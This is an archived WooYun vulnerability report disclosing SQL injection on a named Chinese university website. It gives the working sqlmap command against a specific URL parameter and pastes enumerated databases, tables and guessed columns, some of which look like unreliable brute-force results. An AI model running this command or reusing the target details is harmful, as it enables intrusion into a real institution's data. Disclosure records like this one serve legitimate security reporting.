乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-09: 厂商已经主动忽略漏洞,细节向公众公开
江西广播电视大学SQL注射
注射命令sqlmap.py -u "http://www.jxrtvu.edu.cn/Service/GetSchoolOverview.ashx?TYPEID=" --dbs
随便脱点数据给你们看
Database: jxdd[52 tables]+-----------------------+| IS_Type || SYS_USERLOG || Sys_Log || TE_Activity || TE_Ads || TE_Contact || TE_DTJL || TE_DateDic || TE_Dept || TE_DeptNewsType || TE_LINK || TE_News || TE_Role || TE_RoleMenu || TE_RoleUser || TE_SalaryFL || TE_SalaryGT || TE_SalaryGZ || TE_SalaryJX || TE_SignUp || TE_SignUpTime || TE_SubsitePic || TE_TK || TE_TKLB || TE_User || TE_UserDeptNewsType || TE_VideoNews || View_Contact || View_DTJL || View_Dept || View_DeptNewsType || View_ISType || View_LINK || View_News || View_News_Pic || View_Role || View_RoleUser || View_SalaryFL || View_SalaryGT || View_SalaryGZ || View_SalaryJX || View_Sys_log || View_TE_Activity || View_TE_DateDic || View_TE_NewsAudit || View_TE_SignUp || View_TE_SubsitePic || View_TK || View_TKLB || View_User || View_UserDeptNewsType || View_VideoNews |+-----------------------+Database: jxdd1005[28 tables]+---------------------+| D99_CMD || D99_Tmp || IS_Type || SYS_USERLOG || Sys_Log || TE_Activity || TE_Contact || TE_DTJL || TE_DateDic || TE_Dept || TE_DeptNewsType || TE_LINK || TE_News || TE_Role || TE_RoleMenu || TE_RoleUser || TE_SalaryFL || TE_SalaryGT || TE_SalaryGZ || TE_SalaryJX || TE_SignUp || TE_SignUpTime || TE_SubsitePic || TE_TK || TE_TKLB || TE_User || TE_UserDeptNewsType || TE_VideoNews |+---------------------+Database: jxddtest[28 tables]+---------------------+| IS_Type || SYS_USERLOG || Sys_Log || TE_Activity || TE_Contact || TE_DTJL || TE_DateDic || TE_Dept || TE_DeptNewsType || TE_LINK || TE_News || TE_Role || TE_RoleMenu || TE_RoleUser || TE_SalaryFL || TE_SalaryGT || TE_SalaryGZ || TE_SalaryJX || TE_SignUp || TE_SignUpTime || TE_SubsitePic || TE_TK || TE_TKLB || TE_User || TE_UserDeptNewsType || TE_VideoNews || person_backup || test |+---------------------+Database: msdb[141 tables]+-----------------------------------------------------------+| MSdbms || MSdbms_datatype || MSdbms_datatype_mapping || MSdbms_map || backupfile || backupfilegroup || backupmediafamily || backupmediaset || backupset || log_shipping_monitor_alert || log_shipping_monitor_error_detail || log_shipping_monitor_history_detail || log_shipping_monitor_primary || log_shipping_monitor_secondary || log_shipping_primaries || log_shipping_primary_databases || log_shipping_primary_secondaries || log_shipping_secondaries || log_shipping_secondary || log_shipping_secondary_databases || logmarkhistory || restorefile || restorefilegroup || restorehistory || sqlagent_info || suspect_pages || sysalerts || syscachedcredentials || syscategories || syscollector_blobs_internal || syscollector_collection_items_internal || syscollector_collection_sets_internal || syscollector_collector_types_internal || syscollector_config_store_internal || syscollector_execution_log_internal || syscollector_execution_stats_internal || syscollector_tsql_query_collector || sysdac_history_internal || sysdac_instances_internal || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagelog || sysdtspackages || sysdtssteplog || sysdtstasklog || sysjobactivity || sysjobhistory || sysjobs || sysjobschedules || sysjobservers || sysjobsteps || sysjobstepslogs || sysmail_account || sysmail_attachments || sysmail_attachments_transfer || sysmail_configuration || sysmail_log || sysmail_mailitems || sysmail_principalprofile || sysmail_profile || sysmail_profileaccount || sysmail_query_transfer || sysmail_send_retries || sysmail_server || sysmail_servertype || sysmaintplan_log || sysmaintplan_logdetail || sysmaintplan_subplans || sysmanagement_shared_registered_servers_internal || sysmanagement_shared_server_groups_internal || sysnotifications || sysoperators || sysoriginatingservers || syspolicy_conditions_internal || syspolicy_configuration_internal || syspolicy_execution_internal || syspolicy_facet_events || syspolicy_management_facets || syspolicy_object_sets_internal || syspolicy_policies_internal || syspolicy_policy_categories_internal || syspolicy_policy_category_subscriptions_internal || syspolicy_policy_execution_history_details_internal || syspolicy_policy_execution_history_internal || syspolicy_system_health_state_internal || syspolicy_target_set_levels_internal || syspolicy_target_sets_internal || sysproxies || sysproxylogin || sysproxysubsystem || sysschedules || syssessions || sysssislog || sysssispackagefolders || sysssispackages || syssubsystems || systargetservergroupmembers || systargetservergroups || systargetservers || systaskids || sysutility_mi_configuration_internal || sysutility_mi_cpu_stage_internal || sysutility_mi_dac_execution_statistics_internal || sysutility_mi_session_statistics_internal || sysutility_mi_smo_objects_to_collect_internal || sysutility_mi_smo_properties_to_collect_internal || sysutility_mi_smo_stage_internal || sysutility_mi_volumes_stage_internal || sysutility_ucp_aggregated_dac_health_internal || sysutility_ucp_aggregated_mi_health_internal || sysutility_ucp_computer_cpu_health_internal || sysutility_ucp_computers_stub || sysutility_ucp_configuration_internal || sysutility_ucp_cpu_utilization_stub || sysutility_ucp_dac_file_space_health_internal || sysutility_ucp_dac_health_internal || sysutility_ucp_dacs_stub || sysutility_ucp_databases_stub || sysutility_ucp_datafiles_stub || sysutility_ucp_filegroups_stub || sysutility_ucp_filegroups_with_policy_violations_internal || sysutility_ucp_health_policies_internal || sysutility_ucp_logfiles_stub || sysutility_ucp_managed_instances_internal || sysutility_ucp_mi_database_health_internal || sysutility_ucp_mi_file_space_health_internal || sysutility_ucp_mi_health_internal || sysutility_ucp_mi_volume_space_health_internal || sysutility_ucp_policy_check_conditions_internal || sysutility_ucp_policy_target_conditions_internal || sysutility_ucp_policy_violations_internal || sysutility_ucp_processing_state_internal || sysutility_ucp_smo_servers_stub || sysutility_ucp_snapshot_partitions_internal || sysutility_ucp_space_utilization_stub || sysutility_ucp_supported_object_types_internal || sysutility_ucp_volumes_stub |+-----------------------------------------------------------+Database: master[6 tables]+-----------------------+| MSreplication_options || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values |+-----------------------+Database: ReportServer[34 tables]+---------------------------+| ActiveSubscriptions || Batch || CachePolicy || Catalog || ChunkData || ChunkSegmentMapping || ConfigurationInfo || DBUpgradeHistory || DataSets || DataSource || Event || ExecutionLogStorage || History || Keys || ModelDrill || ModelItemPolicy || ModelPerspective || Notifications || Policies || PolicyUserRole || ReportSchedule || Roles || RunningJobs || Schedule || SecData || Segment || SegmentedChunk || ServerParametersInstance || ServerUpgradeHistory || SnapshotData || Subscriptions || SubscriptionsBeingDeleted || UpgradeInfo || Users |+---------------------------+Table: SYS_USERLOG[90 columns]+---------------------------------+-------------+| Column | Type |+---------------------------------+-------------+| adminname | non-numeric || allowviewlog | numeric || ana_codice | non-numeric || artikel_id | non-numeric || auth_id | non-numeric || beneficiarioid | non-numeric || bloc_row | non-numeric || blog_id | numeric || brend | non-numeric || cd | non-numeric || codigo | non-numeric || comment5 | non-numeric || comune | non-numeric || content_id | non-numeric || context | non-numeric || del_flg | non-numeric || distconnectorid | non-numeric || endstateid | non-numeric || freewaylogin | non-numeric || id_breve | non-numeric || id_servico | non-numeric || idcliente | numeric || iddiscipline | non-numeric || idevent | non-numeric || idoggetto | non-numeric || idprovenienza | non-numeric || idtipologiaservizio | non-numeric || itemno | non-numeric || jcode | non-numeric || jeda | non-numeric || jfcategories | non-numeric || job_s_date | non-numeric || l_col_list | numeric || layer | non-numeric || lbl_aom_unaccessible_shipmethod | non-numeric || level | non-numeric || mealid | non-numeric || meetingid | non-numeric || mod_freeway_products | non-numeric || modify_date | non-numeric || myname | non-numeric || mypassword | non-numeric || newnotices | non-numeric || orecchini | numeric || ostdate | non-numeric || parent_id | non-numeric || passe | non-numeric || permission | numeric || pfs_id | numeric || prc_sconto4 | non-numeric || prenom | numeric || price01 | non-numeric || progetto | non-numeric || provincial | non-numeric || schedaid | non-numeric || secid | non-numeric || serverid | non-numeric || sessionid | non-numeric || settingsid | non-numeric || sot_utente_e | non-numeric || st_id | non-numeric || statechangeid | non-numeric || store2 | non-numeric || store3 | non-numeric || student_number | non-numeric || sub_image1 | non-numeric || sub_large_image4 | non-numeric || temppass | non-numeric || ten | non-numeric || term_id | non-numeric || top | non-numeric || uname | non-numeric || uno | non-numeric || user_ip | non-numeric || user_level | non-numeric || user_nm | non-numeric || user_pwd | non-numeric || user_uname | non-numeric || user_usernm | non-numeric || user_usernun | non-numeric || usrn | non-numeric || usrpass | non-numeric || ustawienie | non-numeric || vm_manufacturer | non-numeric || vm_manufacturer_category | non-numeric || vot_proposta_e | non-numeric || weblinks | non-numeric || xadvogado | non-numeric || xmetodo_atualizacao | non-numeric || yonghu | non-numeric |+---------------------------------+-------------+
不继续了太晚了,睡觉去喽
综上
你们懂
危害等级:无影响厂商忽略
忽略时间:2015-08-09 13:24
暂无
